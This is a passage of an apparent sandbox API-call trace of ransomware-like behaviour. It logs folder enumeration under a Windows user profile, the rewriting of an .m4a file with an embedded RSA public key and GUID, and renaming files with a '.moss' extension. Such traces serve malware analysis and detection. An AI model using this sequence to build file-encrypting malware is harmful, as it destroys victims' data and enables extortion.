cFileName="_Kgve1.m4a", cAlternateFileName="")) returned 1 [0170.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0170.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0170.076] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Kgve1.m4a") returned=".m4a" [0170.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Kgve1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_kgve1.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.076] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=29032) returned 1 [0170.076] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.080] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7142, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.080] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.081] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7168, lpOverlapped=0x0) returned 1 [0170.082] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.082] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.082] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.082] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.082] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0170.083] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.083] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.083] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.083] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.083] GetLastError () returned 0x0 [0170.083] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.083] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0170.083] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.083] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.083] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.084] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.084] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.084] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7168, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.084] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.085] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.085] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.085] CloseHandle (hObject=0x664) returned 1 [0170.086] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41730 [0170.086] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0170.086] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Kgve1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_kgve1.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Kgve1.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_kgve1.m4a.moss")) returned 1 [0170.088] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0xc8f76b70, ftLastWriteTime.dwHighDateTime=0x1d5e0dd, nFileSizeHigh=0x0, nFileSizeLow=0x7168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a", cAlternateFileName="")) returned 0 [0170.088] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0170.088] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41730 [0170.089] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.089] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b416c8 [0170.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.091] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0170.091] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.091] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.091] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.091] PathFindFileNameW (pszPath="") returned="" [0170.091] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0xc8f76b70, ftLastWriteTime.dwHighDateTime=0x1d5e0dd, nFileSizeHigh=0x0, nFileSizeLow=0x7168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a", cAlternateFileName="")) returned 0xffffffff [0170.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41730 | out: hHeap=0xcd0000) returned 1 [0170.092] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.092] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.092] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0170.092] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.092] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.092] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.092] PathFindFileNameW (pszPath="") returned="" [0170.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0xc8f76b70, ftLastWriteTime.dwHighDateTime=0x1d5e0dd, nFileSizeHigh=0x0, nFileSizeLow=0x7168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a", cAlternateFileName="")) returned 0xffffffff [0170.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0170.092] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.092] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.092] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0170.093] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.093] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.093] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.093] PathFindFileNameW (pszPath="") returned="" [0170.093] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9947fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9947fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41730 | out: hHeap=0xcd0000) returned 1 [0170.093] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9947fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9947fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.093] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2555e30, ftCreationTime.dwHighDateTime=0x1d5e5ba, ftLastAccessTime.dwLowDateTime=0x18dafeb0, ftLastAccessTime.dwHighDateTime=0x1d5e131, ftLastWriteTime.dwLowDateTime=0x18dafeb0, ftLastWriteTime.dwHighDateTime=0x1d5e131, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="612n", cAlternateFileName="")) returned 1 [0170.093] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0170.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0170.093] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc56cc5c0, ftCreationTime.dwHighDateTime=0x1d5e6ca, ftLastAccessTime.dwLowDateTime=0xa3742920, ftLastAccessTime.dwHighDateTime=0x1d5d98e, ftLastWriteTime.dwLowDateTime=0xa3742920, ftLastWriteTime.dwHighDateTime=0x1d5d98e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="js4wnFUoxs42X9Y0mylB", cAlternateFileName="JS4WNF~1")) returned 1 [0170.094] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37389b0, ftCreationTime.dwHighDateTime=0x1d5e1c8, ftLastAccessTime.dwLowDateTime=0x3e0538e0, ftLastAccessTime.dwHighDateTime=0x1d5e57d, ftLastWriteTime.dwLowDateTime=0x3e0538e0, ftLastWriteTime.dwHighDateTime=0x1d5e57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ynvUi8OA0E 4g2YjdS", cAlternateFileName="YNVUI8~1")) returned 1 [0170.094] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 1 [0170.094] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 0 [0170.094] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0170.094] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.094] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0170.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.094] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.094] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.094] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.094] PathFindFileNameW (pszPath="") returned="" [0170.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 0xffffffff [0170.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b416c8 | out: hHeap=0xcd0000) returned 1 [0170.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41730 | out: hHeap=0xcd0000) returned 1 [0170.095] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, 